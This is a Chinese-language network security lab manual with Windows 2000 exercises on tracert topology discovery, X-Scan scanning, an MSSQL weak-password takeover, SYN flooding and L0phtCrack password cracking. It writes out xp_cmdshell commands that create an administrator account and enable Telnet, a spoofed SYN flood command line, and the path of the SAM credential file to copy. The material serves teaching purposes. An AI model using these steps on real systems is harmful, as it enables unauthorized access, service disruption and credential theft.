使用Tracert命令检测路由和拓扑结构信息
实验目的:通过使用Tracert命令获得网络的拓扑结构信息
实验环境:Windows2000
实验步骤:
1.点击开始>运行,输入cmd,打开命令行窗口
2.输入以下命令tracert 目标主机IP,观察结果;
3.输入tracert google.com,观察结果;
上图反映了从本机到google站点所经过的路由信息,客观的显示出了网络拓扑结构,黑客可以通过这一命令对被攻击方的网络状况进行初步了解,为实施下进一步攻击奠定基础;同时安全管理人员也可以借助于这一工具探查、分析网络中的重要路由节点。
注:在Unix系统中,运行tracertroute命令,可以看出同样返回了路由信息。
通过使用Tracet命令可以检测系统的拓扑结构,这样就可以在黑客攻击之前有针对性地制定安全策略、实施防火墙架构,同时也为侦查网络故障提供路由级报告
使用X-Scan软件进行网络扫描
实验目的:掌握X-Scan扫描工具基本方法
实验环境:Windows2000
实验工具:X-Scan
实验步骤:
1.从Server上下载X-scan安装包文件,或从http://www.xfocus.net下载,然后进行本地安装。
2.运行xscan_gui.exe 。
3.选取设置标签->少描参数,在指定IP范围中输入X.X.X.X(X.X.X.X为扫描IP或网段);
4.点击运行按钮,进行少描;
5.等待扫描结果;
6.查看漏洞信息;
X-scan作为攻击者常用的扫描工具,提供了常用的网络扫描功能。对网络中的计算机的信息、漏洞进行检测,从而为黑客的攻击提供必要的、有价值的信息。
分析MSSQLServer弱口令攻击
实验目的:熟悉MSSQLServer弱口令的攻击原理与过程
实验环境:Windows2000+MSSQLServe
实验工具:SQL查询分析器
实验步骤:
1.利用X-Scan扫描目标主机发现SQLServer的SA有弱口令;
2.单击开始->程序->Microsoft SQL Server->查询分析器,点击运行;
3.输入目标主机IP(例如:192.168.2.125),sa的密码XXX(例如sa),点击确定,连接目标主机;
4.在查询窗口输入:xp_cmdshell ‘net user hacker hacker /add’参数,向目标主机添加一个用户名为“hacker”密码为“hacker”的用户;
5.点击运行后,结果窗口出现命令执行成功;
6.在查询窗口输入:xp_cmdshell ‘net localgroup administrators hacker /add’参数,将目标主机中的“hacker”用户添加到本地administrator组里;
7.点击运行后,结果窗口出现命令执行成功;
8.在查询窗口输入:xp_cmdshell ‘net start telnet’参数,将目标主机中Telnet服务启动;
9.点击运行后,结果窗口出现命令执行成功;
10.点击开始>运行,输入cmd,打开命令行窗口
11.输入以下命令Telnet 目标主机IP(例如:192.168.16.125),观察结果
12.输入前面创建的用户名和密码;
13.回车后,Telnet登录成功。
分析SYNFLOOd攻击原理
实验目的:熟悉SYNflood的攻击原理与过程,及IPv4所存在的固有缺陷
实验环境:Windows2000
实验工具: synflood攻击工具、Snifferpro
实验步骤:
1.实验人员A:登录到一台Windows2000,到开命令行提示窗口,运行netstat命令,观察响应在这里,netstat -an命令显示了所有当前连接,可以注意到netstat所返回的记录是比较少的,因为这时还没有开始SYN Flood攻击
2.实验人员B:登录到另一台Windows2000,在命令行模式下运行synflood.exe程序;输入:synflood.exe 10.1.1.1 192.168.16.125 8888 139 ;
3.实验人员A:再次运行netstat -an命令行程序,注意观察SYNflood攻击的结果:可以看到系统收到大量的从伪造的IP地址发出的SYN包,导致与系统的半开连接数量急剧上升;
4.实验人员A:按住CTRL+C以退出netstat;
5.实验人员A:打开SnifferPro,准备捕捉从任何目标发送的本机的SYN包;
6.实验人员B:再次开始SYN flood攻击;
7.实验人员A:捕获数据包,解码打开后进行观察;
8.实验人员A:在TCP对象中,添加ConnectionsPassive和Connection计数器;
9.实验人员B:再次发起SYN flood攻击;
10. 实验人员A:注意观察当受到SYN flood攻击时,计数器值大幅增长。
使用L0phtCrack破解WindOWSNT密码
实验目的:了解NT对于密码加密的弱点
实验环境:Windows2000
实验工具: LC5
实验步骤:
1.从Server上获得LOpht安装包,然后将LOphtCrack安装到本地;
2.通过实验四登录到被攻击主机上拷贝该机器的SAM文件到本地
SAM文件位置:%SystemRoot%\\\\system32\\\repair\\\\sam
3.点击开始->程序->LC5>LC5,打开LophtCrack
4.在Session菜单中选择第一项Import
5.在Import from file项目中选择from SAM file,点击browes选取拷贝的SAM文件后点击OK;
6.L0phCrack中将显示合作伙伴的所有的用户名列表,在tool菜单中,选择Begin Audit
取决于密码复杂性和用户数量,LOPhtCrack将花费相应的时间以破解出密码,观察对方新建用户的密码;使用L0phtCrack破解NT密码属于字典/穷举算法,这也是很多暴力攻击工具使用的方法,密码稍微复杂,就会花费相当长的时间,因此,适当使用较为复杂的密码可以极大地加强系统的安全性。